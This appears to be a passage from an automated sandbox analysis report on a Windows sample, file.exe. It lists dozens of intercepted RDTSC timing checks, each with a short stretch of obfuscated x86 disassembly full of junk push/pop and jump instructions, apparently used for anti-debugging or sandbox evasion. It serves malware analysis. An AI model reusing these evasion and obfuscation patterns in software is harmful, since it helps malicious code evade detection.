                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7569 second address: AE7575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7575 second address: AE757A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9CCD second address: AE9CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9CD3 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 30D845EBh 0x0000000d mov edx, dword ptr [ebp+122D2A29h] 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov si, cx 0x0000001c call dword ptr [ebp+122D3589h] 0x00000022 pushad 0x00000023 jng 00007F0AD95F882Ch 0x00000029 xor eax, eax 0x0000002b jmp 00007F0AD95F882Eh 0x00000030 add dword ptr [ebp+122D34B1h], ebx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a or dword ptr [ebp+122D34B1h], ebx 0x00000040 add dword ptr [ebp+122D34B1h], edi 0x00000046 mov dword ptr [ebp+122D29C9h], eax 0x0000004c mov dword ptr [ebp+122D34B1h], edi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D2E75h], edx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jg 00007F0AD95F8827h 0x00000067 lodsw 0x00000069 jmp 00007F0AD95F8832h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F0AD95F882Eh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D34B1h], edi 0x00000081 push eax 0x00000082 pushad 0x00000083 push esi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D01 second address: AE9D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D07 second address: AE9D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or ecx, dword ptr [ebp+122D2C21h] 0x00000012 push 00000000h 0x00000014 mov dx, di 0x00000017 call 00007F0AD95F8829h 0x0000001c jnp 00007F0AD95F8832h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D53 second address: AE9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D57 second address: AE9DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0AD95F8837h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0AD95F8830h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007F0AD95F8826h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9DA1 second address: AE9DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9DBE second address: AE9E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov esi, 72B4BA4Bh 0x00000010 mov dword ptr [ebp+122D37E6h], ecx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 je 00007F0AD95F882Ch 0x00000038 mov dword ptr [ebp+122D274Fh], edx 0x0000003e push 00000000h 0x00000040 or edi, dword ptr [ebp+122D2A5Dh] 0x00000046 push 00000003h 0x00000048 jmp 00007F0AD95F8837h 0x0000004d call 00007F0AD95F8829h 0x00000052 jmp 00007F0AD95F8831h 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9E47 second address: AE9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9E4B second address: AE9EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007F0AD95F882Fh 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e jno 00007F0AD95F8840h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007F0AD95F882Ch 0x00000030 jg 00007F0AD95F8826h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EA5 second address: AE9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EAB second address: AE9EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EAF second address: AE9ED6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D1B3Dh], ebx 0x00000013 lea ebx, dword ptr [ebp+1244FC0Ch] 0x00000019 add dword ptr [ebp+122D27BEh], edx 0x0000001f mov edi, edx 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA089 second address: AEA08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA08D second address: AEA091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA19C second address: AEA1E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 22BA316Ah 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0AD95F8828h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov cx, B331h 0x00000030 lea ebx, dword ptr [ebp+1244FC20h] 0x00000036 add edi, 067E2900h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnp 00007F0AD95F8828h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0992B second address: B09931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09AA9 second address: B09ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD95F8830h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09ADA second address: B09AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F0AD8C6A9BEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09AF2 second address: B09B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09EE9 second address: B09EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09EED second address: B09F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8833h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A06F second address: B0A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F0AD8C6A9B6h 0x00000011 jmp 00007F0AD8C6A9BDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1D5 second address: B0A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1DB second address: B0A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1DF second address: B0A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1E5 second address: B0A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A202 second address: B0A24D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0AD95F882Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F0AD95F882Ah 0x0000001a jmp 00007F0AD95F882Ch 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0AD95F8833h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A24D second address: B0A251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A251 second address: B0A255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A255 second address: B0A25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A25B second address: B0A279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jo 00007F0AD95F883Ch 0x0000000c jmp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A3AE second address: B0A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD8C6A9C5h 0x0000000b jmp 00007F0AD8C6A9BDh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A70D second address: B0A736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD95F8836h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A898 second address: B0A8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F0AD8C6A9B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8AB second address: B0A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8BC second address: B0A8D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8D0 second address: B0A8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8D6 second address: B0A8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8DA second address: B0A8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B239 second address: B0B23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B3C8 second address: B0B3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8831h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B3DF second address: B0B3F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B51D second address: B0B53D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0AD95F8836h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B53D second address: B0B55A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B86C second address: B0B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B165D0 second address: B16601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 jmp 00007F0AD8C6A9C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F0AD8C6A9BEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B168B7 second address: B168BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16B33 second address: B16B47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0AD8C6A9B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16DCA second address: B16DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0AD95F8826h 0x00000009 jnl 00007F0AD95F8826h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 je 00007F0AD95F882Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16DE4 second address: B16DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0AD8C6A9F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16DF8 second address: B16E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16E0E second address: B16E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18F7D second address: B18F87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18F87 second address: B18FCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F0AD8C6A9CAh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0AD8C6A9BEh 0x0000001e popad 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193B5 second address: B193BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193BF second address: B193CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193CF second address: B193D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193D3 second address: B193E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19C01 second address: B19C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19C09 second address: B19C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A0AF second address: B1A0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A13F second address: B1A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A1C7 second address: B1A1D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A63E second address: B1A67A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add esi, dword ptr [ebp+122D3580h] 0x00000012 push 00000000h 0x00000014 ja 00007F0AD8C6A9BCh 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D2D45h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A67A second address: B1A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A67E second address: B1A684 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AF82 second address: B1AF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AF9A second address: B1AFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C0AC second address: B1C129 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F0AD95F8826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0AD95F8828h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F0AD95F8837h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0AD95F8828h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+1244EE55h], edi 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5DF second address: B1D5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D2F8 second address: B1D317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD95F8834h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5E3 second address: B1D5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5E9 second address: B1D5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5EF second address: B1D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21DEE second address: B21DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21DF2 second address: B21DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22EB3 second address: B22EBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22EBD second address: B22ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0AD8C6A9C2h 0x0000000d jbe 00007F0AD8C6A9BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2403A second address: B24056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0AD95F8826h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24056 second address: B2405A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
